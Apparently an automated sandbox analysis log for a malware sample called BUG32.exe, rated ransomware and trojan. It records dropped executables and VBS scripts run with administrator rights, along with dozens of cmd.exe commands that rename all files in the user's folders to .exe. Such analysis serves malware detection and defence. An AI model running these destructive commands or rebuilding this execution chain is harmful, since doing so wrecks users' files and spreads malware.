    Source: C:\Users\user\Desktop\BUG32.exeCode function: 0_2_0040BAE90_2_0040BAE9
    Source: C:\Users\user\Desktop\BUG32.exeCode function: 0_2_0040B8990_2_0040B899
    Source: C:\Users\user\Desktop\BUG32.exeCode function: 0_2_00712B710_2_00712B71
    Source: C:\Users\user\AppData\Local\Temp\aJEWGt.exeCode function: 1_2_00AE60761_2_00AE6076
    Source: C:\Users\user\AppData\Local\Temp\aJEWGt.exeCode function: 1_2_00AE6D001_2_00AE6D00
    Source: C:\Users\user\AppData\Local\Temp\aJEWGt.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6164 -s 1492
    Source: BUG32.exeStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
    Source: MyProg.exe.1.drStatic PE information: Resource name: RT_VERSION type: MIPSEB-LE ECOFF executable not stripped - version 0.79
    Source: BUG32.exe, 00000000.00000003.2028575508.0000000000C5A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameNoways.exe. vs BUG32.exe
    Source: BUG32.exe, 00000000.00000003.2026291126.0000000000C5A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsaccessdenied.exe> vs BUG32.exe
    Source: BUG32.exe, 00000000.00000002.2052125385.0000000000411000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamemsaccessdenied.exe> vs BUG32.exe
    Source: BUG32.exe, 00000000.00000002.2052125385.0000000000419000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameNoways.exe. vs BUG32.exe
    Source: BUG32.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
    Source: aJEWGt.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: ad.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: 6C7D10EA.exe.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: ad.exe.3.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: 1206337459.exe.5.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: DC_Reader_Disc_LHP_Retention.exe.5.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: Network Persistent State.exe.5.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: CURRENT.exe.5.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: 0786087c3c360803_0.exe.5.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: LOCK.exe.5.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: data_1.exe.5.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: classification engineClassification label: mal100.rans.spre.troj.evad.winEXE@1431/383@3/1
    Source: C:\Users\user\AppData\Local\Temp\aJEWGt.exeCode function: 1_2_00AE119F GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,CloseHandle,1_2_00AE119F
    Source: C:\Users\user\Desktop\BUG32.exeCode function: 0_2_00402C3B FindResourceA,LoadResource,SizeofResource,0_2_00402C3B
    Source: C:\Users\user\AppData\Local\Temp\aJEWGt.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\k1[1].rarJump to behavior
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeMutant created: \Sessions\1\BaseNamedObjects\Local\Microsoft_WMP_70_CheckForOtherInstanceMutex
    Source: C:\Users\user\Desktop\BUG32.exeFile created: C:\Users\user\AppData\Local\Temp\aJEWGt.exeJump to behavior
    Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\BUG32\js.bat" "
    Source: C:\Users\user\Desktop\BUG32.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\sysnative\wscript.exe" C:\Users\user\AppData\Local\Temp\CB7D.tmp\CB7E.vbs
    Source: BUG32.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.98%
    Source: C:\Users\user\Desktop\BUG32.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
    Source: C:\Users\user\Desktop\BUG32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: BUG32.exeVirustotal: Detection: 87%
    Source: BUG32.exeReversingLabs: Detection: 95%
    Source: unknownProcess created: C:\Users\user\Desktop\BUG32.exe "C:\Users\user\Desktop\BUG32.exe"
    Source: C:\Users\user\Desktop\BUG32.exeProcess created: C:\Users\user\AppData\Local\Temp\aJEWGt.exe C:\Users\user\AppData\Local\Temp\aJEWGt.exe
    Source: C:\Users\user\Desktop\BUG32.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\sysnative\wscript.exe" C:\Users\user\AppData\Local\Temp\CB7D.tmp\CB7E.vbs
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" "C:\BUG32\admin.vbs"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" "C:\bug32\jaq.vbs" RunAsAdministrator
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Program Files (x86)\Windows Media Player\wmplayer.exe "C:\Program Files (x86)\Windows Media Player\wmplayer.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c dir "C:\Users\user\" /s/b/o:n/a:d > "C:\BUG32\list.lnk" & echo :ok:>>"C:\bug32\list.lnk"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess created: C:\Windows\SysWOW64\unregmp2.exe "C:\Windows\System32\unregmp2.exe" /AsyncFirstLogon
    Source: C:\Windows\SysWOW64\unregmp2.exeProcess created: C:\Windows\System32\unregmp2.exe "C:\Windows\SysNative\unregmp2.exe" /AsyncFirstLogon /REENTRANT
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\.ms-ad\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\3D Objects\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\Application Data\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\Contacts\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\Cookies\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\AppData\Local\Temp\aJEWGt.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6164 -s 1492
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\Desktop\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\Documents\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\Downloads\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\Favorites\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\Links\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\Local Settings\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\Music\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\My Documents\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\NetHood\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\OneDrive\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\Pictures\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\PrintHood\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\Recent\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\Saved Games\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\Searches\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\SendTo\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\Start Menu\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\Videos\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\LocalLow\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Roaming\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Adobe\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\CEF\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Comms\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\ConnectedDevicesPlatform\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\D3DSCache\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Google\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\History\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Microsoft\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Mozilla\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\PeerDistRepub\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Publishers\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\SolidDocuments\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Temp\*.*" "*.exe"
    Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" "C:\bug32\runner.vbs"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\BUG32\js.bat" "
    Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\BUG32\nokill.bat" "
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\BUG32\jsc.exe "C:\BUG32\jsc.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Temporary Internet Files\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe wscript.exe "C:\BUG32\emptyone.vbs"
    Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" "C:\bug32\jaq.vbs" RunAsAdministrator
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\VirtualStore\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Adobe\Acrobat\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Adobe\ARM\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Adobe\Color\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Adobe\Acrobat\DC\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Adobe\AcroCef\DC\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cookie\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Cache\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Network\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\blob_storage\336a045b-df12-4067-9f71-93ee2edb038d\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Cache\Cache_Data\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\wasm\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\index-dir\*.*" "*.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
